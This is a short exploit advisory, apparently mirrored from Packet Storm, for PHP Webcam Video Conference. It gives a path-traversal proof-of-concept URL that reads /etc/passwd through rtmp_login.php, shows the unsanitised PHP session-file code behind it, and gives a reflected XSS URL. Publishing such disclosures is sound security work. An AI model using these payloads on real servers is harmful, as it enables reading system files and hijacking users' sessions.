Lucene search
K

PHP Webcam Video Conference Local File Inclusion / XSS

🗓️ 06 Feb 2014 00:00:00Reported by vinicius777Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

PHP Webcam Video Conference Local File Inclusion and XSS vulnerabilit

Code
`# Exploit: PHP Webcam Video Conference - LFI/XSS  
# Date: 06/02/2014  
# Exploit Author: vinicius777  
# Contact: vinicius777 [AT] gmail / @vinicius777_  
# Vendor Homepage: http://www.videowhisper.com/  
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference  
# Solution: Upgrade from to the new version on videowhisper vendor homepage.  
  
  
  
  
[1] Local File Include - rtmp_login.php  
  
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd  
  
[+] rtmp_rlogin.php  
  
$session = $_GET['s'];  
  
$filename1 = "uploads/_sessions/$session";  
if (file_exists($filename1))  
{  
echo implode('', file($filename1));  
}  
else  
{  
echo "VideoWhisper=1&login=0";  
}  
?>  
  
  
[2] XSS Reflected  
  
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2014 00:00Current
7.4High risk
Vulners AI Score7.4
39